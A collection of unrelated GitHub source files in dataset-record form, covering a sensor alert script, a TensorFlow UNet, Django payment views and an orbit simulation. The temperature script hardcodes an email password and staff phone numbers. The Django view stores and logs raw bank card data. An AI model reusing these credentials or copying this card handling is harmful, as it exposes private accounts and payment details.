(\"Courier\", 20, \"bold\"))\n    stylo_rejouer.hideturtle()\n","repo_name":"zW1ck3dz/Space-Invaders","sub_path":"game_over.py","file_name":"game_over.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"38653906383","text":"\"\"\"Keeps the state of the GUI and related signals / slots.\"\"\"\n\nfrom PySide2.QtCore import QObject, Signal, Slot\n\n\nclass _StateKeeper(QObject):\n    \"\"\"Used as a singleton to enable communication between objects that don't have a direct relationship.\n\n    In the section `Other Parameters`, all Signals are listed. You can emit a certain signal by calling\n    `StateKeeper.<signal name>.emit(<potential arguments, like a text>)`. Slots are listed as Methods and you can\n    connect to them like this: `StateKeeper.<slot name>.connect(<the method you want to call upon emission of that\n    signal>)`.\n\n    Attributes\n    ----------\n    current_frame\n        The frame that is shown by :class:`mad_gui.VideoWindow`\n    label_state\n        One of the states \"add\", \"remove\", \"edit\", or \"investigate\". State information is color-coded by the buttons\n        in the\n        upper part of the GUI. 
Can be changed by mouse-click or shortcuts \"a\", \"e\", or \"Esc\".\n gui_has_unsaved_changes\n Keeps information if there has been any user interaction since last time data was either exported using\n :meth:`mad_gui.MainWindow._export` or saved using :meth:`mad_gui.MainWindow._save_data_gui_format`.\n\n \"\"\"\n\n announce_data_types = Signal(dict) # MainWindow / DataSelector\n executed_algorithms = []\n\n save_sync = Signal()\n\n data_position_changed = Signal(float)\n video_window_closed = Signal()\n video_duration_available = Signal(float, float)\n gui_has_unsaved_changes = False\n plugins = []\n\n @Slot(int)\n def frame_changed(self, frame: int):\n self.signal_sample_changed.emit(self.synchronizer.frame_to_sample(frame))\n self.signal_frame_changed.emit(frame)\n\n @Slot(bool)\n def set_has_unsaved_changes(self, flag: bool):\n self.gui_has_unsaved_changes = flag\n\n\nStateKeeper = _StateKeeper()\n","repo_name":"mad-lab-fau/mad-gui","sub_path":"mad_gui/state_keeper.py","file_name":"state_keeper.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"95"} +{"seq_id":"25488616114","text":"#!/usr/bin/python\n#--------------------------------------\n# ___ ___ _ ____\n# / _ \\/ _ \\(_) __/__ __ __\n# / , _/ ___/ /\\ \\/ _ \\/ // /\n# /_/|_/_/ /_/___/ .__/\\_, /\n# /_/ /___/\n#\n# dht11.py\n# Basic example script to read DHT11 sensor using \n# Adafruit DHT library:\n# https://github.com/adafruit/Adafruit_Python_DHT\n#\n# Based on examples by Tony DiCola\n#\n# Author : Matt Hawkins\n# Date : 04/09/2017\n#\n# http://www.raspberrypi-spy.co.uk/tag/dht11/\n#\n#--------------------------------------\n\n#Didn't want to remove credit from the guy above who created the base of the code that I expanded on incase you guys want to check out the original\n\n#Created this code to check the temperature and send out emails/text alerts when over a certain amount of degrees\n#There is a cronjob that runs this script everyday at 5:01pm after everyone leaves for the day\n#The script is designed to run for 23 hours and 58 minutes\n#To view the cronjob type crontab -l\n#To change the cronjob settings type crontab -e and change the one corresponding to this file\n#Use the website: https://crontab.guru/ to help when changing the time for the cron schedule\n#For anything else cronjob related resort to this article: https://www.ostechnix.com/a-beginners-guide-to-cron-jobs/\n\nimport os\nimport re\nimport Adafruit_DHT\nimport time\nimport threading\nfrom datetime import datetime\nimport smtplib, ssl\n\n# Set sensor type : Options are DHT11,DHT22 or AM2302\nsensor = Adafruit_DHT.DHT22\n\n# Set GPIO sensor is connected to.\ngpio = 17\n\n#Set date and time\n\nnow = datetime.now()\ndt_string = now.strftime(\"%m/%d/%Y %H:%M\")\n\n#method for opening and writing to a file\ndef tempfile():\n f = open(\"temperature.txt\",'a+')\n for i in range (2):\n f.write(str)\n\nSMTP_PORT = 587 # For SSL\nSMTP_SERVER = \"smtp.gmail.com\" # Enter type of email server run\nGMAIL_USERNAME = \"noreply@easternia.com\" # Enter your address\nGMAIL_PASSWORD = \"newaccount12\" # Enter your password\nclass Emailer:\n def sendmail(self, recipient, subject, content):\n \n #Create Headers\n headers = [\"From: \" + GMAIL_USERNAME, \"Subject: \" + subject, \"To: \" + recipient,\n \"MIME-Version: 1.0\", \"Content-Type: text/html\"]\n headers = \"\\r\\n\".join(headers)\n \n #Connect to Gmail Server\n session = smtplib.SMTP(SMTP_SERVER, SMTP_PORT)\n session.ehlo()\n 
session.starttls()\n session.ehlo()\n \n #Login to Gmail\n session.login(GMAIL_USERNAME, GMAIL_PASSWORD)\n \n #Send Email & Exit\n session.sendmail(GMAIL_USERNAME, recipient, headers + \"\\r\\n\\r\\n\" + content)\n session.quit\n\n# Sets up where to send Emails\nsender = Emailer()\nsendTo = 'it@easternia.com' #It email chain\nsendTo2 = '3392292459@vtext.com' #Oliver\nsendTo3 = '3392224287@vtext.com' #Steve\nsendTo4 = '6175195579@vtext.com' #Chris\nsendTo5 = '7814241042@vtext.com' #Bob\n\n# Sets up the email subject and contents\nemailSubject = \"Waltham Server Rooms Hot\" \nemailContent = \"This is a test of my Email of temperature alerts\" \nemailSubject2 = \"Temperature Gauge Offline!!\" \nemailContent2 = \"Temperature gauge has been knocked offline. Failed to get reading.\"\n\n# Sets the maximum temperature for room before Alerts are sent out \ntempmax = (75.9) #Change value to set temperature\n\n\n# Creates a function called run_check to be called upon and executed to send the emails/texts out \ndef run_check():\n humidity, temperature = Adafruit_DHT.read_retry(sensor, gpio) #Assigns humidty and temperature output to respective variables\n temperature = float(temperature * 1.8 + 32) #Changes the temperature value from celsius to farenheit\n now = datetime.now() #Assigns the date and time to variable now\n dt_string = now.strftime(\"%m/%d/%Y %H:%M\") #Formats the now variable and assigns to a new variable dt_string\n if humidity is not None and temperature is not None: #if statement to make sure sensor is working\n print('Temp={0:0.1f} Humidity={1:0.1f}% '.format(temperature, humidity),dt_string) #Placed this here for testing purposes prints out if works\n if temperature > float(tempmax): #If the temperature is over the amount set in tempmax it will send emails/texts\n \n # Sends an email to the \"sendTo\" address with the specified \"emailSubject\" as the subject and \"emailContent\" as the email content.\n sender.sendmail(sendTo, emailSubject, emailContent)\n sender.sendmail(sendTo2, emailSubject, emailContent)\n sender.sendmail(sendTo3, emailSubject, emailContent)\n sender.sendmail(sendTo4, emailSubject, emailContent)\n sender.sendmail(sendTo5, emailSubject, emailContent)\n print ('fire sent')\n else:\n print ('ok')\n else:\n sender.sendmail(sendTo, emailSubject2, emailContent2) #Sends out the notice that the reader is down to IT email\n print('Failed to get reading. Try again!')\n \n\n#Sets the counter values for the loops\ncounter2 = (5) #This counter is set to 29 because the counter2 if statement is triggered once it hits 30. 
it then takes an hour with this setup to trigger again\ncounter = (0) #For the while loop so our main loop keeps going for 23 hrs and 58min because the sleep time is set to 2 minutes and runs 719 times\n\nwhile counter < 143:\n #runs the runcheck command and sends out emails and texts alerts\n\n #Needed to run temperature check seperate to save it to temp1 variable\n humidity, temperature = Adafruit_DHT.read_retry(sensor, gpio)\n temperature = float(temperature * 1.8 + 32)\n now = datetime.now()\n dt_string = now.strftime(\"%m/%d/%Y %H:%M\")\n #Saves Temperature to a variable\n temp1 = ('Temp={0:0.1f} Humidity={1:0.1f}% '.format(temperature, humidity),dt_string)\n #Turns temperature output into a string\n temp2 = (str(temp1))\n #expression to remove weird characters from string\n temp3 = re.sub(\"'|\\(|\\)|,\", '', temp2)\n print(temp3)\n f = open(\"temperature.txt\",'a+')\n f.write(temp3)\n f.write(\"\\r\\n\")\n f.close()\n if temperature > float(tempmax):\n print('fire')\n counter2 = counter2 + 1\n counter = counter + 1 \n else:\n counter = counter + 1\n if counter2 >= (6):\n emailContent = \"Waltham server room temperature is high, the current temp is: \" + str(int(temperature)) + \" degrees\"\n run_check()\n counter2 = (0)\n else:\n print ('ok') \n time.sleep(599) #Amount of seconds before the code runs again\nprint ('finished')\n\n#humidity, temperature = Adafruit_DHT.read_retry(sensor, gpio)\n \n# Reading the DHT11 is very sensitive to timings and occasionally\n# the Pi might fail to get a valid reading. So check if readings are valid.\n#if humidity is not None and temperature is not None:\n #print('Temp={0:0.1f}*C Humidity={1:0.1f}%'.format(temperature, humidity))\n#else:\n #print('Failed to get reading. Try again!')\n","repo_name":"osantana19/Temperature_Monitor","sub_path":"dht11.py","file_name":"dht11.py","file_ext":"py","file_size_in_byte":7042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11802996272","text":"name = input(\"Enter Your Name=\")\r\nd = {}\r\nfor i in name:\r\n d[i] = d.get(i,0)+1\r\nfor x,y in d.items():\r\n print(x,\"occur\",y,\"times\")\r\ngreater = dict((x, y) for x, y in d.items() if y >1)\r\nprint (\"The value greater than 1 is printed here=\",greater)\r\nequal = dict((x, y) for x, y in d.items() if y ==1)\r\nprint (\"The value equal to 1 is printed here=\",equal)\r\nprint(sorted([x,\"is the highest occur in\",y,\"times\"]for x,y in d.items())[0])\r\n","repo_name":"THULASIPRABHA/Task","sub_path":"task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"5115653579","text":"\"\"\" UNet \"\"\"\nfrom typing import Literal\n\nimport tensorflow as tf\nfrom pydantic import BaseModel, Field\n\nfrom .blocks import batch_norm, layer_norm, relu6\n\n\nclass UNetBlockParams(BaseModel):\n \"\"\"UNet block parameters\"\"\"\n\n filters: int = Field(..., description=\"# filters\")\n depth: int = Field(default=1, description=\"Layer depth\")\n kernel: int | tuple[int, int] = Field(default=3, description=\"Kernel size\")\n pool: int | tuple[int, int] = Field(default=3, description=\"Pool size\")\n strides: int | tuple[int, int] = Field(default=1, description=\"Stride size\")\n skip: bool = Field(default=True, description=\"Add skip connection\")\n seperable: bool = Field(default=False, description=\"Use seperable convs\")\n dropout: float | None = Field(default=None, description=\"Dropout 
rate\")\n    norm: Literal[\"batch\", \"layer\"] | None = Field(default=\"batch\", description=\"Normalization type\")\n    dilation: int | tuple[int, int] | None = Field(default=None, description=\"Dilation factor\")\n\n\nclass UNetParams(BaseModel):\n    \"\"\"UNet parameters\"\"\"\n\n    blocks: list[UNetBlockParams] = Field(default_factory=list, description=\"UNet blocks\")\n    include_top: bool = Field(default=True, description=\"Include top\")\n    use_logits: bool = Field(default=True, description=\"Use logits\")\n    model_name: str = Field(default=\"UNet\", description=\"Model name\")\n    output_kernel_size: int | tuple[int, int] = Field(default=3, description=\"Output kernel size\")\n    output_kernel_stride: int | tuple[int, int] = Field(default=1, description=\"Output kernel stride\")\n    include_rnn: bool = Field(default=False, description=\"Include RNN\")\n\n\ndef UNet(\n    x: tf.Tensor,\n    params: UNetParams,\n    num_classes: int,\n) -> tf.keras.Model:\n    \"\"\"Create UNet TF functional model\n\n    Args:\n        x (tf.Tensor): Input tensor\n        params (UNetParams): Model parameters.\n        num_classes (int): # classes.\n\n    Returns:\n        tf.keras.Model: Model\n    \"\"\"\n    requires_reshape = len(x.shape) == 3\n    if requires_reshape:\n        y = tf.keras.layers.Reshape((1,) + x.shape[1:])(x)\n    else:\n        y = x\n\n    #### ENCODER ####\n    skip_layers: list[tf.keras.layers.Layer | None] = []\n    for i, block in enumerate(params.blocks):\n        name = f\"ENC{i+1}\"\n        ym = y\n        for d in range(block.depth):\n            dname = f\"{name}.D{d+1}\"\n            if block.dilation is None:\n                dilation_rate = (1, 1)\n            elif isinstance(block.dilation, int):\n                dilation_rate = (block.dilation**d, block.dilation**d)\n            else:\n                dilation_rate = (block.dilation[0] ** d, block.dilation[1] ** d)\n            if block.seperable:\n                ym = tf.keras.layers.SeparableConv2D(\n                    block.filters,\n                    kernel_size=block.kernel,\n                    strides=(1, 1),\n                    padding=\"same\",\n                    dilation_rate=dilation_rate,\n                    depthwise_initializer=\"he_normal\",\n                    pointwise_initializer=\"he_normal\",\n                    depthwise_regularizer=tf.keras.regularizers.L2(1e-3),\n                    pointwise_regularizer=tf.keras.regularizers.L2(1e-3),\n                    use_bias=block.norm is None,\n                    name=f\"{dname}.conv\",\n                )(ym)\n            else:\n                ym = tf.keras.layers.Conv2D(\n                    block.filters,\n                    kernel_size=block.kernel,\n                    strides=(1, 1),\n                    padding=\"same\",\n                    dilation_rate=dilation_rate,\n                    kernel_initializer=\"he_normal\",\n                    kernel_regularizer=tf.keras.regularizers.L2(1e-3),\n                    use_bias=block.norm is None,\n                    name=f\"{dname}.conv\",\n                )(ym)\n            if block.norm == \"layer\":\n                ym = layer_norm(name=dname, axis=[1, 2])(ym)\n            elif block.norm == \"batch\":\n                ym = batch_norm(name=dname, momentum=0.99)(ym)\n            ym = relu6(name=dname)(ym)\n        # END FOR\n\n        # Project residual\n        yr = tf.keras.layers.Conv2D(\n            block.filters,\n            kernel_size=(1, 1),\n            strides=(1, 1),\n            padding=\"same\",\n            kernel_initializer=\"he_normal\",\n            kernel_regularizer=tf.keras.regularizers.L2(1e-3),\n            name=f\"{name}.skip\",\n        )(y)\n\n        if block.dropout is not None:\n            ym = tf.keras.layers.Dropout(block.dropout, noise_shape=ym.shape)(ym)\n        y = tf.keras.layers.add([ym, yr], name=f\"{name}.add\")\n\n        skip_layers.append(y if block.skip else None)\n\n        y = tf.keras.layers.MaxPooling2D(block.pool, strides=block.strides, padding=\"same\", name=f\"{name}.pool\")(y)\n    # END FOR\n\n    if params.include_rnn:\n        if requires_reshape:\n            y = tf.keras.layers.Reshape(y.shape[2:])(y)\n            y = tf.keras.layers.LSTM(units=params.blocks[-1].filters, return_sequences=True)(y)\n            y = tf.keras.layers.Reshape((1,) + y.shape[1:])(y)\n        else:\n            y = 
tf.keras.layers.ConvLSTM1D(params.blocks[-1].filters, padding=\"same\", return_sequences=True)(y)\n\n    #### DECODER ####\n    for i, block in enumerate(reversed(params.blocks)):\n        name = f\"DEC{i+1}\"\n        for d in range(block.depth):\n            dname = f\"{name}.D{d+1}\"\n            # Compute the dilation rate per block/depth, mirroring the encoder schedule\n            if block.dilation is None:\n                dilation_rate = (1, 1)\n            elif isinstance(block.dilation, int):\n                dilation_rate = (block.dilation**d, block.dilation**d)\n            else:\n                dilation_rate = (block.dilation[0] ** d, block.dilation[1] ** d)\n            if block.seperable:\n                y = tf.keras.layers.SeparableConv2D(\n                    block.filters,\n                    kernel_size=block.kernel,\n                    strides=(1, 1),\n                    padding=\"same\",\n                    dilation_rate=dilation_rate,\n                    depthwise_initializer=\"he_normal\",\n                    pointwise_initializer=\"he_normal\",\n                    depthwise_regularizer=tf.keras.regularizers.L2(1e-3),\n                    pointwise_regularizer=tf.keras.regularizers.L2(1e-3),\n                    use_bias=block.norm is None,\n                    name=f\"{dname}.conv\",\n                )(y)\n            else:\n                y = tf.keras.layers.Conv2D(\n                    block.filters,\n                    kernel_size=block.kernel,\n                    strides=(1, 1),\n                    padding=\"same\",\n                    dilation_rate=dilation_rate,\n                    kernel_initializer=\"he_normal\",\n                    kernel_regularizer=tf.keras.regularizers.L2(1e-3),\n                    use_bias=block.norm is None,\n                    name=f\"{dname}.conv\",\n                )(y)\n            if block.norm == \"layer\":\n                y = layer_norm(name=dname, axis=[1, 2])(y)\n            elif block.norm == \"batch\":\n                y = batch_norm(name=dname, momentum=0.99)(y)\n            y = relu6(name=dname)(y)\n        # END FOR\n\n        y = tf.keras.layers.UpSampling2D(size=block.strides, name=f\"{dname}.unpool\")(y)\n\n        # Add skip connection\n        dname = f\"{name}.D{block.depth+1}\"\n        skip_layer = skip_layers.pop()\n        if skip_layer is not None:\n            y = tf.keras.layers.concatenate([y, skip_layer], name=f\"{dname}.cat\") # Can add or concatenate\n            # Use 1x1 conv to reduce filters\n            y = tf.keras.layers.Conv2D(\n                block.filters,\n                kernel_size=(1, 1),\n                padding=\"same\",\n                kernel_initializer=\"he_normal\",\n                kernel_regularizer=tf.keras.regularizers.L2(1e-3),\n                use_bias=block.norm is None,\n                name=f\"{dname}.conv\",\n            )(y)\n            if block.norm == \"layer\":\n                y = layer_norm(name=dname, axis=[1, 2])(y)\n            elif block.norm == \"batch\":\n                y = batch_norm(name=dname, momentum=0.99)(y)\n            y = relu6(name=dname)(y)\n        # END IF\n\n        dname = f\"{name}.D{block.depth+2}\"\n        if block.seperable:\n            ym = tf.keras.layers.SeparableConv2D(\n                block.filters,\n                kernel_size=block.kernel,\n                strides=(1, 1),\n                padding=\"same\",\n                depthwise_initializer=\"he_normal\",\n                pointwise_initializer=\"he_normal\",\n                depthwise_regularizer=tf.keras.regularizers.L2(1e-3),\n                pointwise_regularizer=tf.keras.regularizers.L2(1e-3),\n                use_bias=block.norm is None,\n                name=f\"{dname}.conv\",\n            )(y)\n        else:\n            ym = tf.keras.layers.Conv2D(\n                block.filters,\n                kernel_size=block.kernel,\n                strides=(1, 1),\n                padding=\"same\",\n                kernel_initializer=\"he_normal\",\n                kernel_regularizer=tf.keras.regularizers.L2(1e-3),\n                use_bias=block.norm is None,\n                name=f\"{dname}.conv\",\n            )(y)\n        if block.norm == \"layer\":\n            ym = layer_norm(name=dname, axis=[1, 2])(ym)\n        elif block.norm == \"batch\":\n            ym = batch_norm(name=dname, momentum=0.99)(ym)\n        ym = relu6(name=dname)(ym)\n\n        # Project residual\n        yr = tf.keras.layers.Conv2D(\n            block.filters,\n            kernel_size=(1, 1),\n            padding=\"same\",\n            kernel_initializer=\"he_normal\",\n            kernel_regularizer=tf.keras.regularizers.L2(1e-3),\n            name=f\"{name}.skip\",\n        )(y)\n        y = tf.keras.layers.add([ym, yr], name=f\"{name}.add\") # Add back residual\n    # END FOR\n\n    if params.include_top:\n        # Add a per-point classification layer\n        y = tf.keras.layers.Conv2D(\n            num_classes,\n            kernel_size=params.output_kernel_size,\n            padding=\"same\",\n            kernel_initializer=\"he_normal\",\n            kernel_regularizer=tf.keras.regularizers.L2(1e-3),\n            name=\"NECK.conv\",\n            use_bias=True,\n        )(y)\n        if not params.use_logits:\n            y = 
tf.keras.layers.Softmax()(y)\n        # END IF\n    # END IF\n    if requires_reshape:\n        y = tf.keras.layers.Reshape(y.shape[2:])(y)\n    # Define the model\n    model = tf.keras.Model(x, y, name=params.model_name)\n    return model\n","repo_name":"AmbiqAI/sleepkit","sub_path":"sleepkit/models/unet.py","file_name":"unet.py","file_ext":"py","file_size_in_byte":10064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"}{"seq_id":"25510727915","text":"import numpy as np\n\ndef power(sample1, sample2, reps, size, alpha):\n    times_greater = 0\n    mean_sample_1 = np.mean(sample1)\n    mean_sample_2 = np.mean(sample2)\n    obsv = mean_sample_2 - mean_sample_1\n\n    new_samples_index1 = np.random.randint(0, size, (reps, size))\n    new_samples_index2 = np.random.randint(0, size, (reps, size))\n    new_samples1 = sample1[new_samples_index1]\n    new_samples2 = sample2[new_samples_index2]\n\n    for rep in range(reps):\n        s1 = new_samples1[rep, :]\n        s2 = new_samples2[rep, :]\n        s1_mean = np.mean(s1)\n        s2_mean = np.mean(s2)\n        perm = s2_mean-s1_mean\n        if perm > obsv:\n            times_greater += 1  # count bootstrap differences exceeding the observed difference\n\n\n    p = times_greater/reps\n    return p\n","repo_name":"nwisken/ce888labs","sub_path":"lab2/Power.py","file_name":"Power.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}{"seq_id":"74399056953","text":"from django.shortcuts import render\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\nfrom chetverka.models import Ticket, PricesAndProducts, Transaction, bankCard, logger\nfrom django.views.generic import DetailView\nfrom chetverka.forms import bankCardForm\nfrom teletroyka.models import TelegramUser\nimport re, random, json\n\nfrom rest_framework.parsers import JSONParser\n\n\ndef log(request):\n    search_query = request.GET.get('search')\n    data = Ticket.objects.all()\n    if search_query is None:\n        data = Ticket.objects.filter(id__in=data).order_by('id')\n    elif re.match(r\"\\D{2,}\", search_query) is not None:\n        data = Ticket.objects.filter(id__in=data, ticket_type__contains=search_query).order_by('-id')\n    elif re.match(r\"\\d{10}\", search_query) is not None:\n        data = Ticket.objects.filter(id__in=data, ticket_number__contains=search_query).order_by('-id')\n    elif re.search(r\"\\d{1,}\", search_query) is not None:\n        data = Ticket.objects.filter(id__in=data, id__contains=search_query).order_by('-id')\n    else:\n        print('Not Found')\n    return render(request, 'chetverka/log.html', {'Ticket': data})\n\n\nclass Detalization(DetailView):\n    model = Ticket\n    template_name = 'chetverka/detalization.html'\n    context_object_name = 'record'\n\n\ndef base(request):\n    data = PricesAndProducts.objects.all()\n    return render(request, 'chetverka/base.html', {'price': data})\n\nclass PricesAndProductsController(DetailView):\n    model = PricesAndProducts\n    template_name = 'base/chetverka/payform.html'\n    context_object_name = 'record'\n    form = bankCardForm\n\n\n\n    def get_context_data(self, **kwargs):\n\n        context = super(PricesAndProductsController, self).get_context_data(**kwargs)\n        context['form'] = bankCardForm()\n        return context\n\n    def post(self, request, *args, **kwargs):\n        user = TelegramUser.objects.get(pk=1) # TODO: change the user ID!!\n        if request.method == 'POST':\n            form = bankCardForm(request.POST)\n            if form.is_valid():\n                bank_card = form.save(commit=False)\n                print(bank_card)\n                bank_card.telegramuser = user\n                print(bank_card)\n                bank_card.save()\n                transact = Transaction.objects.create(tr_status='Succeed', bankcard=bank_card)\n                
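# issue a 'Troika' ticket with a random 10-digit number tied to this transaction\n                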
Ticket.objects.create(ticket_type='Тройка', ticket_number=random.randint(1000000000, 9999999999), transaction=transact)\n                return render(request, 'chetverka/status.html')\n        else:\n            form = bankCardForm(initial=user)\n\n        return render(request, 'chetverka/base.html', {'form': form})\n\ndef test(request):\n    return render(request, 'chetverka/TestView.html')\n\n@api_view(['POST'])\ndef pay(request):\n\n    print(request.data)\n    data = dict(request.data)\n\n    data1 = str(data.get('description[]'))\n    user_id = re.search(r\"\\d{9,10}\", str(data.get('tg_user_data')))\n\n    try:\n        teleuser = TelegramUser.objects.get(telegram_user_id=user_id[0])\n        bank_card = bankCard.objects.create(card_value=data.get('bank_card[]')[2], expired_month=data.get('bank_card[]')[3], expired_year=data.get('bank_card[]')[4], card_holder=data.get('bank_card[]')[0], telegramuser=teleuser)\n        transact = Transaction.objects.create(tr_status='Succeed', tr_obj_description=data.get('description[]'), bankcard=bank_card)\n\n        match = re.findall(r\"'\\d{1,2}\", data1)\n        match1 = re.findall(r\"\\d{1,2}\", str(match))\n        name = re.findall(r\"Билет \\w* \\\"\\D*\\\"\", data1)\n        print(len(data['description[]']))\n\n        for i in range(len(data['description[]'])):\n            prod = PricesAndProducts.objects.get(product=name[i])\n            for a in range(int(match1[i])):\n                Ticket.objects.create(ticket_number=random.randint(1000000000, 9999999999), transaction=transact, tovar=prod)\n        logger.objects.create(log=request.data, error=None)\n    except Exception as e:\n        logger.objects.create(log=user_id, error=e)\n\n\n    return Response({'status': 1})","repo_name":"Xmel01/chetverka-main","sub_path":"chetverka/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4080,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"}{"seq_id":"12880298153","text":"from numpy import sqrt\nimport time\nimport RungeKuttaFehlberg as RKF\nimport numpy as np\n# for Python 2 use:\n# from Tkinter import * ## note the capitalized T in Tkinter\nimport scipy.integrate as integrate\n\nimport matplotlib.pyplot as plot\nimport matplotlib.animation as animation\n\n\nclass Orbit:\n    GravConstant = 6.67408 * 10 ** (-11)\n    M_e = 5.972 * 10 ** 24\n    M_m = 7.34767309 * 10 ** 22\n    h = 0.1\n    tol = 5e-14\n    prevPositions = [[0], [384400000]]\n\n    \"\"\"\n\n    Orbit Class\n\n    init_state is [t0,x0,vx0,y0,vy0],\n    where (x0,y0) is the initial position,\n    (vx0,vy0) is the initial velocity\n    and t0 is the initial time\n    \"\"\"\n\n    def __init__(self,\n                 init_state,\n                 G=GravConstant,\n                 m1=M_e,\n                 m2=M_m,\n                 ):\n        self.GravConst = G\n        self.mPlanet1 = m1\n        self.mPlanet2 = m2\n        self.state = np.asarray(init_state, dtype='float')\n        self.rkf54 = RKF.RungeKuttaFehlberg54(self.ydot, len(self.state), self.h, self.tol)\n        self.prevPositions = self.prevPositions\n\n    def getPos(self):\n        return self.prevPositions\n\n    def addPos(self, x, y):\n        self.prevPositions[0].append(x)\n        self.prevPositions[1].append(y)\n\n    def position(self):\n        \"\"\"compute the current x,y positions of the two bodies\"\"\"\n        x1 = self.state[1]\n        y1 = self.state[3]\n        x2 = self.state[5]\n        y2 = self.state[7]\n        return (x1, y1), (x2, y2)\n\n    def energy(self):\n        pxJ = self.state[1]\n        vxJ = self.state[2]\n        pyJ = self.state[3]\n        vyJ = self.state[4]\n        pxM = self.state[5]\n        vxM = self.state[6]\n        pyM = self.state[7]\n        vyM = self.state[8]\n        mJorda = self.mPlanet1\n        mManen = self.mPlanet2\n        G = self.GravConst\n        dist = np.sqrt((pxM - pxJ) ** 2 + (pyM - pyJ) ** 2)\n        uTot = -G * mJorda * mManen / dist\n        kJorda = mJorda * (vxJ ** 2 + 
vyJ ** 2) / 2\n        kManen = mManen * (vxM ** 2 + vyM ** 2) / 2\n        return (kJorda + uTot + kManen) / (10 ** 24)\n\n    def time_elapsed(self):\n        return self.state[0]\n\n    def step(self):\n        w0 = self.state\n        self.state, E = self.rkf54.safeStep(w0)\n\n    def ydot(self, x):\n        mJorda = self.mPlanet1\n        mManen = self.mPlanet2\n        pxJ = x[1]\n        vxJ = x[2]\n        pyJ = x[3]\n        vyJ = x[4]\n        pxM = x[5]\n        vxM = x[6]\n        pyM = x[7]\n        vyM = x[8]\n\n        z = np.zeros(9)\n        dist = np.sqrt((pxM - pxJ) ** 2 + (pyM - pyJ) ** 2)\n        z[0] = 1\n        z[1] = vxJ\n        z[2] = (self.GravConst * mManen * (pxM - pxJ)) / (dist ** 3)\n        z[3] = vyJ\n        z[4] = (self.GravConst * mManen * (pyM - pyJ)) / (dist ** 3)\n        z[5] = vxM\n        z[6] = (self.GravConst * mJorda * (pxJ - pxM)) / (dist ** 3)\n        z[7] = vyM\n        z[8] = (self.GravConst * mJorda * (pyJ - pyM)) / (dist ** 3)\n        return z\n\n\n# make an Orbit instance\n# init_state: [t0, x0J, vx0J, y0J, vy0J, x0M, vx0M, y0M, vy0M]\norbit = Orbit([0, 0, 0, 0, 0, 0, -1022, 384000000, 0])\ndt = 1. / 30 # 30 frames per second\n\n# The figure is set\nfig = plot.figure()\naxes = fig.add_subplot(111, aspect='equal', autoscale_on=False,\n                       xlim=(-0.5 * 10 ** 9, 0.5 * 10 ** 9), ylim=(-0.5 * 10 ** 9, 0.5 * 10 ** 9))\n\ntrail, = axes.plot([], [], 'r--', lw=0.5)\nlineA, = axes.plot([], [], 'o-b', lw=60, ms=12) # A blue planet 6*10**6\nlineB, = axes.plot([], [], 'o-r', lw=17, ms=3.4) # A red moon\n\n# line2, = axes.plot([], [], 'o-y', lw=2) # A yellow sun\ntime_text = axes.text(0.02, 0.95, '', transform=axes.transAxes)\nenergy_text = axes.text(0.02, 0.90, '', transform=axes.transAxes)\n\n\ndef init():\n    \"\"\"initialize animation\"\"\"\n    lineA.set_data([], [])\n    trail.set_data([], [])\n    lineB.set_data([], [])\n    time_text.set_text('')\n    energy_text.set_text('')\n    return lineA, lineB, time_text, energy_text\n\n\ndef animate(i):\n    \"\"\"perform animation step\"\"\"\n    global orbit, dt\n    secondsPerFrame = 3600 * 24 / 36\n    t0 = orbit.state[0]\n    while orbit.state[0] < t0 + secondsPerFrame:\n        orbit.step()\n\n    posJ, posM = orbit.position()\n    x = posM[0]\n    y = posM[1]\n    orbit.addPos(x, y)\n    trail.set_data(orbit.getPos())\n    lineA.set_data(*posJ)\n    lineB.set_data(*posM)\n    t1 = orbit.time_elapsed()\n    antallDager = t1 / (24 * 3600)\n\n    time_text.set_text('time %.3f Days' % antallDager)\n    energy_text.set_text('energy = %.5f YJ' % orbit.energy())\n    return lineA, lineB, time_text, energy_text\n\n\n# choose the interval based on dt and the time to animate one step\n# Take the time for one call of the animate.\nt0 = time.time()\nanimate(0)\nt1 = time.time()\n\ndelay = 2000 * dt - (t1 - t0)\n\nanim = animation.FuncAnimation(fig, # figure to plot in\n                               animate, # function that is called on each frame\n                               frames=1200, # total number of frames\n                               interval=1000.0/30, # time to wait between each frame, in milliseconds\n                               repeat=False,\n                               blit=True,\n                               init_func=init # initialization\n                               )\n\n# save the animation as an mp4. This requires ffmpeg or mencoder to be\n# installed. The extra_args ensure that the x264 codec is used, so that\n# the video can be embedded in html5. 
You may need to adjust this for\n# your system: for more information, see\n# http://matplotlib.sourceforge.net/api/animation_api.html\nanim.save('Oppg3.mp4', fps=30, extra_args=['-vcodec', 'libx264'])\n\n#\n#\n#plot.show()\n","repo_name":"HallvardSelthun/TDAT3024Prosjekt","sub_path":"Oppgave3.py","file_name":"Oppgave3.py","file_ext":"py","file_size_in_byte":5621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"15820885235","text":"__docformat__ = \"reStructuredText\"\n\nimport sys\nimport optparse\nimport time\n\n\nfrom pyang import plugin, error, xpath_lexer, util, statements, types\n\nfrom .schemanode import SchemaNode\n\ndef pyang_plugin_init():\n plugin.register_plugin(DSDLPlugin())\n\nclass DSDLPlugin(plugin.PyangPlugin):\n def add_output_format(self, fmts):\n self.multiple_modules = True\n fmts['dsdl'] = self\n def add_opts(self, optparser):\n optlist = [\n optparse.make_option(\"--dsdl-no-documentation\",\n dest=\"dsdl_no_documentation\",\n action=\"store_true\",\n default=False,\n help=\"No output of DTD compatibility\"\n \" documentation annotations\"),\n optparse.make_option(\"--dsdl-no-dublin-core\",\n dest=\"dsdl_no_dublin_core\",\n action=\"store_true\",\n default=False,\n help=\"No output of Dublin Core\"\n 